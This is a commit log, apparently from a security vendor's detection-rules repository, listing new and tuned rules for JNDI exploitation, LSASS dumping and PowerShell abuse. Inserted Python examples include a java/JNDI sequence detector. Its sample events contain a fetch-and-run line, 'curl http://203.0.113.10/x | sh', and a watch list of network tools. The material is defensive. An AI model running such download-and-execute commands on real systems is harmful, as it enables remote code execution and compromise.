github-actions[bot]
1977411e42
Lock versions for releases: 7.13,7.14,7.15,7.16 (#1659)
* Locked versions for releases: 7.13,7.14,7.15,7.16
(cherry picked from commit a33de6bfb8)
2021-12-11 04:07:13 +00:00
Samirbous
69231ff734
[New Rule] Potential JAVA/JNDI Exploitation Attempt (#1658)
* [New Rule] Potential JAVA/JNDI Exploitation Attempt
Identifies an outbound network connection by JAVA to LDAP, RMI or DNS standard ports followed by suspicious JAVA child processes. This may indicate an attempt to exploit a JAVA/JNDI injection vulnerability.
* rule ID
* expanded JAVA/DNI to Java Naming and Directory Interface
* added ruby and php to list of suspchildprocs
* Update execution_suspicious_java_netcon_childproc.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 7978b3cc9e)
2021-12-11 01:07:31 +00:00
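The two-stage logic this commit message describes (java connects outbound to an LDAP/RMI/DNS port, then spawns a suspicious child), run over constructed events, as an added example. It is not the detection-rules repository's rule or code: the port set, the suspicious-child list, the one-minute window and the event fields are assumptions made for illustration.

```python
"""Sequence detection for the JNDI-style pattern: a java process opens an outbound
connection to an LDAP/RMI/DNS port and, shortly afterwards, spawns a suspicious
child process. Added example, not the detection-rules repository's own code.
Ports, child list, window and event shape are assumptions; all events below
are constructed, not captured from a real host."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed standard ports: LDAP 389, LDAPS 636, RMI registry 1099, DNS 53.
JNDI_PORTS = {389, 636, 1099, 53}
# Assumed child processes that are suspicious when their parent is java.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "python", "python3",
                       "perl", "ruby", "php", "curl", "wget", "nc"}
# Assumed maximum gap between the connection and the child process.
WINDOW = timedelta(minutes=1)


@dataclass(frozen=True)
class NetworkEvent:
    ts: datetime
    host: str
    pid: int            # pid of the process that opened the connection
    process_name: str
    direction: str      # "outbound" or "inbound"
    dest_port: int


@dataclass(frozen=True)
class ProcessEvent:
    ts: datetime
    host: str
    parent_pid: int
    parent_name: str
    name: str
    args: str


def detect(events: list) -> list[tuple[NetworkEvent, ProcessEvent]]:
    """Return (connection, child) pairs where a java process connected outbound to a
    JNDI port and then, on the same host and within WINDOW, spawned a suspicious child."""
    # (host, java pid) -> qualifying outbound connections seen so far, in time order
    pending: dict[tuple[str, int], list[NetworkEvent]] = defaultdict(list)
    hits: list[tuple[NetworkEvent, ProcessEvent]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if isinstance(ev, NetworkEvent):
            if (ev.process_name == "java" and ev.direction == "outbound"
                    and ev.dest_port in JNDI_PORTS):
                pending[(ev.host, ev.pid)].append(ev)
            continue
        if ev.parent_name != "java" or ev.name not in SUSPICIOUS_CHILDREN:
            continue
        # The first earlier connection by the same java parent inside the window
        # completes the sequence. Stage one alone (java talking to DNS or LDAP) is
        # ordinary traffic and never alerts by itself.
        for net in pending.get((ev.host, ev.parent_pid), []):
            if timedelta(0) <= ev.ts - net.ts <= WINDOW:
                hits.append((net, ev))
                break
    return hits


T0 = datetime(2021, 12, 10, 12, 0, 0)
SAMPLE_EVENTS = [  # constructed sample telemetry
    # web01: java -> LDAP port, two seconds later bash runs a download one-liner (alert)
    NetworkEvent(T0, "web01", 4242, "java", "outbound", 389),
    ProcessEvent(T0 + timedelta(seconds=2), "web01", 4242, "java", "bash",
                 "bash -c 'curl http://203.0.113.10/x | sh'"),
    # web01: ordinary DNS lookup by java with no child afterwards (no alert)
    NetworkEvent(T0 + timedelta(seconds=30), "web01", 4242, "java", "outbound", 53),
    # web02: DNS lookup, then bash ten minutes later, outside the window (no alert)
    NetworkEvent(T0, "web02", 5100, "java", "outbound", 53),
    ProcessEvent(T0 + timedelta(minutes=10), "web02", 5100, "java", "bash",
                 "bash /opt/app/rotate-logs.sh"),
    # web03: RMI connection, then javac, which is not in the suspicious set (no alert)
    NetworkEvent(T0, "web03", 6000, "java", "outbound", 1099),
    ProcessEvent(T0 + timedelta(seconds=1), "web03", 6000, "java", "javac", "javac Foo.java"),
    # web04: inbound LDAP connection, so direction excludes it, then sh (no alert)
    NetworkEvent(T0, "web04", 7000, "java", "inbound", 389),
    ProcessEvent(T0 + timedelta(seconds=1), "web04", 7000, "java", "sh", "sh -c id"),
]


def alerts_for(events=SAMPLE_EVENTS) -> list[str]:
    """Human-readable alert lines for the matched sequences."""
    return [f"{net.host}: java pid {net.pid} -> port {net.dest_port}, "
            f"then {child.name}: {child.args}" for net, child in detect(events)]


if __name__ == "__main__":
    for line in alerts_for():
        print(line)
```

Only web01 fires: the other three hosts each satisfy one half of the sequence, which is why the rule pairs the connection with the child process instead of alerting on java's LDAP or DNS traffic alone.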
Samirbous
d0334c92bc
[Rule Tuning] Suspicious JAR Child Process (#1657)
* [Rule Tuning] Suspicious JAR Child Process
Expand rule coverage by removing the requirement that process.args contain a jar file, which may also help detect exploitation attempts via command injection vulnerabilities in server apps running JAVA.
* Update rules/cross-platform/execution_suspicious_jar_child_process.toml
(cherry picked from commit 410d4e5929)
2021-12-11 01:05:31 +00:00
Jonhnathan
a21031dd6f
[New Rule] PowerShell Reflection Assembly Load (#1559)
* Create defense_evasion_posh_assembly_load.toml
* Update defense_evasion_posh_assembly_load.toml
* Update rules/windows/defense_evasion_posh_assembly_load.toml
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
* Change event.code to event.category
* Update rules/windows/defense_evasion_posh_assembly_load.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit d4e06beee6)
2021-12-08 21:00:20 +00:00
Jonhnathan
60408f423d
[Rule Tuning] Powershell Defender Exclusion (#1644)
* Split process.args condition
* Update rules/windows/defense_evasion_defender_exclusion_via_powershell.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit ee548328d5)
2021-12-08 14:52:31 +00:00
Samirbous
39adbea737
[New Rule] Enumeration of Privileged Local Groups Membership (#1557)
* [New Rule] Enumeration of Privileged Local Groups Membership
* Update non-ecs-schema.json
* Update discovery_privileged_localgroup_membership.toml
* removed endpoint index (not needed)
* Update rules/windows/discovery_privileged_localgroup_membership.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit b85818f49c)
2021-12-08 10:24:38 +00:00
Samirbous
3a396b84c0
[New Rule] Privilege Escalation via Rogue Named Pipe Impersonation (#1544)
* [New Rule] Privilege Escalation via Rogue Named Pipe Impersonation
* Update rules/windows/privilege_escalation_via_rogue_named_pipe.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update privilege_escalation_via_rogue_named_pipe.toml
* Update rules/windows/privilege_escalation_via_rogue_named_pipe.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 434e2d0426)
2021-12-08 10:22:07 +00:00
Samirbous
e18c26d9be
[New Rule] Potential LSASS Clone Creation via PssCaptureSnapShot (#1632)
* [New Rule] Potential LSASS Clone Creation via PssCaptureSnapShot
Detects the creation of an LSASS clone via event 4688 (Sysmon process creation as well as Elastic endpoint don't capture clone creation due to the way 4688 logs the process creation event even before an initial thread starts).
* adding extra ref url
(cherry picked from commit e3b76b7cf7)
2021-12-08 10:17:12 +00:00
Jonhnathan
f393cc35a0
[Rule Tuning] Replaces event.code with event.category on PowerShell ScriptBlock Rules (#1620)
* Replaces event.code with event.category
* bump updated_date
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 851c566730)
2021-12-08 06:33:39 +00:00
Justin Ibarra
5589c47eab
[Rule Tuning] updates from documentation review for 7.16 (#1645)
(cherry picked from commit 14c46f50b9)
2021-12-08 00:44:11 +00:00
Ece Özalp
9cae4c2c8b
Updates Host Risk Score documentation (#1643)
* update host-risk-score.md
* Update docs/experimental-machine-learning/host-risk-score.md
Co-authored-by: Janeen Mikell-Straughn <57149392+jmikell821@users.noreply.github.com>
Co-authored-by: Ryland Herrick <ryalnd@gmail.com>
Co-authored-by: Ece Ozalp <ece.ozalp@elastic.co>
(cherry picked from commit 0935a853fb)
2021-12-08 00:06:45 +00:00
Jonhnathan
6bc87199f0
[Rule Tuning] Switch "Roshal Archive (RAR) or PowerShell File Downloaded from the Internet" to use KQL (#1651)
* Update command_and_control_download_rar_powershell_from_internet.toml
* bump updated_date
(cherry picked from commit 7b0383ffe2)
2021-12-07 12:10:07 +00:00
Jonhnathan
6a91e9f91b
Limit index to logs-endpoint.events (#1647)
(cherry picked from commit f6a2437cf8)
2021-12-06 16:46:17 +00:00
Apoorva Joshi
3d1bea4b65
Adding Beaconing docs (#1621)
* Adding beaconing docs
* Adding a call out about import options
* Adding a note about the AD job
* Adding more clarity on the release bundle
* Update beaconing.md
* Update docs/experimental-machine-learning/beaconing.md
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit 237dcd2e19)
2021-12-01 16:45:44 +00:00
Samirbous
89b75b9792
[New Rule] Suspicious Process Creation CallTrace (#1588)
* [New Rule] Suspicious Process Creation CallTrace
* Update non-ecs-schema.json
* added min stack vers
* min_stack_vers not needed
* Update rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit d43e3d8e4e)
2021-11-30 20:36:43 +00:00
Apoorva Joshi
9fefe5bfe6
Updating host risk score and experimental detections docs (#1639)
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit d061bf8e7c)
2021-11-30 19:25:38 +00:00
Khristinin Nikita
33030f09fa
[Rule Tuning] Support ECS 1.11 field for IM rule (#1560)
* Support ecs field for IM rule
* update time interval
* Change additional lookback to 5 minutes
* Add old rule
* Add newline
* Update rules/cross-platform/threat_intel_module_match.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Remove im legacy rule
* Update name and description
* Remove min_stack_comment
* Keep 2 IM rule
* add min_stack_comments to rule
* Update rules/cross-platform/threat_intel_indicator_match.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* adds new rules
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Ece Özalp <ozale272@newschool.edu>
Co-authored-by: Ece Ozalp <ece.ozalp@elastic.co>
(cherry picked from commit c619844b0d)
2021-11-30 18:26:44 +00:00
Austin Songer
67f77a3fcb
[New Rule] Azure Kubernetes Rolebindings Created (#1576)
* Create azure_kubernetes_rolebinding_created_or_deleted.toml
* Update
* Update privilege_escalation_azure_kubernetes_rolebinding_created_or_deleted.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_created_or_deleted.toml to privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update rules/integrations/azure/privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml to privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_modified.toml to privilege_escalation_azure_kubernetes_rolebinding_created.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_created.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit 521f0987ae)
2021-11-29 12:17:03 +00:00
Austin Songer
526c4e2678
[New Rule] Clearing Windows Console History (#1623)
* Create defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* bump severity
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit 13fc69b70a)
2021-11-25 16:26:25 +00:00
Austin Songer
89c49a34b5
[New Rule] Windows Firewall Disabled (#1565)
* Create defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Rename defense_evasion_windows_firewall_profile_disabled.toml to defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Rename defense_evasion_windows_firewall_disabled.toml to defense_evasion_windows_firewall_profile_disabled.toml
* Update rules/windows/defense_evasion_windows_firewall_profile_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/defense_evasion_windows_firewall_profile_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Rename defense_evasion_windows_firewall_profile_disabled.toml to defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update defense_evasion_powershell_windows_firewall_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit 2ac19440c2)
2021-11-24 21:35:08 +00:00
LaZyDK
ac69faedbf
[Rule Tuning] Component Object Model Hijacking (#1491)
* Update persistence_suspicious_com_hijack_registry.toml
Add HKEY_USERS\*Classes\CLSID\*\LocalServer32\ to exclusions.
* Update updated_date
* Update rules/windows/persistence_suspicious_com_hijack_registry.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/persistence_suspicious_com_hijack_registry.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit dd3e924e4a)
2021-11-24 11:58:44 +00:00
Samirbous
e3adb3e089
[New Rule] Potential Credential Access via Renamed COM+ Services DLL (#1569)
* [New Rule] Potential Credential Access via Renamed COM+ Services DLL
* update dates
* adding config note
* relinted
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* update minstack version
* minstack not needed, rule should work on previous versions
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit d1636258e4)
2021-11-18 09:28:55 +00:00
Samirbous
24ef481853
[New Rule] Account Password Reset Remotely (#1571)
* [New Rule] Account Password Reset Remotely
* Update non-ecs-schema.json
* update ruleId
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 53a17e6b06)
2021-11-18 09:27:02 +00:00
Austin Songer
03db89e733
[New Rule] Azure Active Directory High Risk User AtRisk or Confirmed (#1579)
* Create initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update rules/integrations/azure/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/integrations/azure/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 3dd32608a0)
2021-11-17 22:39:09 +00:00
Jonhnathan
c434a5dbb5
[New Rule] PowerShell Keylogging Script (#1561)
* Create collection_posh_keylogger.toml
* Apply suggestions from Samir
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
* Fix missing OR
* Change dup guid
* Apply suggestions from Justin
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 4b6794df32)
2021-11-17 22:37:50 +00:00
Austin Songer
cb85a35e7a
[Rule Tuning] Suspicious CertUtil Commands (#1564)
(cherry picked from commit ab521f7c4f)
2021-11-17 20:42:11 +00:00
Jonhnathan
791c8f9864
[New Rule] Potential Process Injection via PowerShell (#1552)
* Create defense_evasion_posh_process_injection.toml
* Update defense_evasion_posh_process_injection.toml
* Update description
* Apply suggestions from code review
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
* Apply suggestions from Justin
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 9c54e21820)
2021-11-17 10:34:19 +00:00
Samirbous
2f3519d882
[New Rule] Potential LSASS Memory Dump via PssCaptureSnapShot (#1550)
* [New Rule] Potential LSASS Memory Dump via PssCaptureSnapShot
* Update credential_access_suspicious_lsass_access_via_snapshot.toml
* lint
* Update etc/non-ecs-schema.json
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* moved FP txt to Note.
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* Update etc/non-ecs-schema.json
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
* fix json
* Update credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit e99478db00)
2021-11-17 07:46:35 +00:00
Samirbous
7d806b4d3c
[New Rule] Potential Credential Access via LSASS Memory Dump (#1533)
* [New Rule] Potential Credential Access via LSASS Memory Dump
* Update credential_access_suspicious_lsass_access_memdump.toml
* fix typo in calltrace and event.code type
* Update rules/windows/credential_access_suspicious_lsass_access_memdump.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
* Update credential_access_suspicious_lsass_access_memdump.toml
* added TargetImage to non ecs schema
* Update non-ecs-schema.json
* format
* Update credential_access_suspicious_lsass_access_memdump.toml
* Update credential_access_suspicious_lsass_access_memdump.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com>
(cherry picked from commit c18c08a976)
2021-11-17 07:37:33 +00:00
github-actions[bot]
c1e4bbc2e3
Lock versions for releases: 7.13,7.14,7.15,7.16 (#1619)
* Locked versions for releases: 7.13,7.14,7.15,7.16
(cherry picked from commit f0f3b83eab)
2021-11-16 09:32:29 +00:00
Justin Ibarra
8036eff47e
[bug] Current stack version in deprecation lock missing parens (#1618)
The function was not being properly called, leading to `null` values
(cherry picked from commit bd9e33e761)
2021-11-16 09:19:31 +00:00
Justin Ibarra
eeb087c0fa
Fix kibana-pr command (#1616)
(cherry picked from commit 76503e8bcd)
2021-11-16 08:56:02 +00:00
Justin Ibarra
e2723af3c2
Update registry release from beta to ga
2021-11-15 21:48:46 -09:00
Jonhnathan
77ffac81e2
[New Rule] PowerShell Suspicious Script with Audio Capture Capabilities (#1582)
(cherry picked from commit 858d1cf12c)
2021-11-16 06:20:37 +00:00
Justin Ibarra
d1a4441c73
Bump min_stack_version in version.lock for specific rules (#1614)
(cherry picked from commit d78f6354df)
2021-11-15 23:39:21 +00:00
Justin Ibarra
ef4fc086ee
Remove 7.15+ rules from 7.14 branch (#1613)
* Remove 7.15+ rules from 7.14 branch
2021-11-15 14:35:28 -09:00
Justin Ibarra
c42f86eb15
Test to trigger workflows (#1612)
(cherry picked from commit 59ba8e1540)
2021-11-15 19:03:31 +00:00
Justin Ibarra
1edd4303af
Prepare for creation of 7.16 release branch (#1611)
Removed changes from:
- etc/packages.yml
(selectively cherry picked from commit 95d7e9b6f5)
2021-11-15 18:40:36 +00:00
Justin Ibarra
389a7bf292
Move version lock code to object for portability (#1553)
* Move version lock code to object for portability
* use cached_property to bypass frozen dataclass and set property
* replace load_versions function
(cherry picked from commit 0efae3a52e)
2021-11-15 17:47:17 +00:00
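The technique this commit names (a frozen dataclass whose derived state is set lazily through functools.cached_property), applied to the version-lock bookkeeping that the "Lock versions for releases" entries above refer to, as an added example. It is not the detection-rules repository's own VersionLock object: the lock-file layout, the field names and the bump-on-content-change policy are assumptions made for illustration.

```python
"""Version-lock bookkeeping on a frozen dataclass. The lock file is parsed once,
lazily, through functools.cached_property, which writes into the instance
__dict__ and so sidesteps the frozen dataclass's __setattr__. Added example,
not the detection-rules repository's own code; file layout, field names and
versioning policy are assumptions."""
from __future__ import annotations

import hashlib
import json
import tempfile
from dataclasses import FrozenInstanceError, dataclass
from functools import cached_property
from pathlib import Path


@dataclass(frozen=True)
class VersionLock:
    """Immutable handle on a version.lock file; contents load on first use."""
    path: Path

    @cached_property
    def entries(self) -> dict[str, dict]:
        # A frozen dataclass raises FrozenInstanceError on `self.entries = ...`,
        # so a plain attribute could not be filled in lazily. cached_property
        # stores its result in self.__dict__ directly, bypassing __setattr__:
        # the file is read and parsed once, and later accesses return that dict.
        return json.loads(self.path.read_text())

    def next_version(self, rule_id: str, rule_body: str) -> int:
        """Assumed policy: keep the locked version while the rule's content hash is
        unchanged, bump by one when the content changed, start at 1 for a new rule."""
        digest = hashlib.sha256(rule_body.encode()).hexdigest()
        entry = self.entries.get(rule_id)
        if entry is None:
            return 1
        if entry["sha256"] == digest:
            return entry["version"]
        return entry["version"] + 1


RULE_A = "00000000-0000-4000-8000-000000000001"      # constructed rule id
RULE_A_BODY = 'name = "Rule A"\nquery = "process where true"\n'


def write_sample_lock(path: Path) -> None:
    """Write a constructed lock file (not a real lock from any release)."""
    path.write_text(json.dumps({
        RULE_A: {
            "rule_name": "Rule A",
            "sha256": hashlib.sha256(RULE_A_BODY.encode()).hexdigest(),
            "version": 3,
        }
    }, indent=2))


def demo() -> dict:
    """Exercise caching, immutability and the version policy; return the observations."""
    with tempfile.TemporaryDirectory() as tmp:
        lock_path = Path(tmp) / "version.lock.json"
        write_sample_lock(lock_path)
        lock = VersionLock(lock_path)
        first = lock.entries
        lock_path.unlink()            # file gone: a second read would fail if not cached
        try:
            lock.entries = {}         # frozen dataclass: must raise
            frozen = False
        except FrozenInstanceError:
            frozen = True
        return {
            "cached": first is lock.entries,
            "frozen": frozen,
            "unchanged": lock.next_version(RULE_A, RULE_A_BODY),
            "changed": lock.next_version(RULE_A, RULE_A_BODY + 'severity = "high"\n'),
            "new_rule": lock.next_version("00000000-0000-4000-8000-000000000002",
                                          'name = "Rule B"\n'),
        }


if __name__ == "__main__":
    print(demo())
```

Deleting the file before the second access is the check that the parse really happened once; with a plain property the second read would raise FileNotFoundError, and with a mutable attribute the object would no longer be hashable or safe to share.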
Samirbous
cb1a765524
[New Rule] Suspicious Process Access via Direct System Call (#1536)
* [New Rule] Suspicious Process Access via Direct System Call
* updated query to also catch CallTrace with non-ntdll modules
* Update rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com>
* Update defense_evasion_suspicious_process_access_direct_syscall.toml
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com>
(cherry picked from commit 81a62f5f68)
2021-11-15 09:19:40 +00:00
Justin Ibarra
06340b69b0
Add index as a required field to rule_prompt (#1595)
(cherry picked from commit 5e6a58ebab)
2021-11-15 02:06:42 +00:00
Jonhnathan
25bfddb291
[Rule Tuning] Rename extrac.exe to extrac32.exe (#1601)
(cherry picked from commit 017d9a51b7)
2021-11-15 02:02:16 +00:00
Adrian Serrano
f656c7bc25
Fix Windows path causing emoji to be rendered in Kibana (#1585)
In impact_hosts_file_modified rule, the `note` field contains a Windows
path that causes a confused-face-emoji to be rendered in the
Investigation Guide tab.
Surrounding the path in backticks fixes it.
(cherry picked from commit aa219710a1)
2021-11-03 16:02:33 +00:00
Ece Özalp
715188695b
Create host-risk-score.md (#1599)
update the script name to match the shipped artifact
(cherry picked from commit e29a1ca25c)
2021-11-03 08:07:01 +00:00
Khristinin Nikita
2c197b57fb
Change interval and lookback time for IM rule (#1596)
(cherry picked from commit f47b0f61cc)
2021-11-01 08:28:42 +00:00
Justin Ibarra
365c2a73f2
[Rule Tuning] Hosts File Modified - add process check for linux (#1593)
* [Rule Tuning] Hosts File Modified - add process check for linux
* add echo and sed to process names in query
(cherry picked from commit ff16832003)
2021-10-29 03:57:38 +00:00
Ross Wolf
ac4e49bcda
Update the marshmallow dependencies in requirements.txt (#1475)
* Update the marshmallow dependencies in requirements.txt
* Fix typo
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit d03e7972a6)
2021-10-29 03:51:48 +00:00
Justin Ibarra
a58666393e
Refresh ECS (1.12.1) and beats (7.15.1) schemas (#1584)
* Refresh ECS (1.12.1) and beats (7.15.1) schemas
* update ecs to 1.10 for 7.14 stack validation
* add note with reference url
Removed changes from:
- rules/cross-platform/defense_evasion_agent_spoofing_mismatched_id.toml
- rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml
(selectively cherry picked from commit c8cf88cd62)
2021-10-28 16:25:33 +00:00
Justin Ibarra
fa3b089c4c
Add support for eql-wildcard and kql-match_only_text (#1583)
* Add support for eql-wildcard and kql-match_only_text
* bump kql version
* lookup elasticsearch type family prior to getting type hint
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com>
(cherry picked from commit d12c04761f)
2021-10-28 13:58:44 +00:00
Apoorva Joshi
3e717800a8
Updating docs to highlight explainability (#1542)
* Updating docs to highlight explainability
* Update typosquatting_rule.md
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com>
(cherry picked from commit 0b57778be6)
2021-10-26 20:35:18 +00:00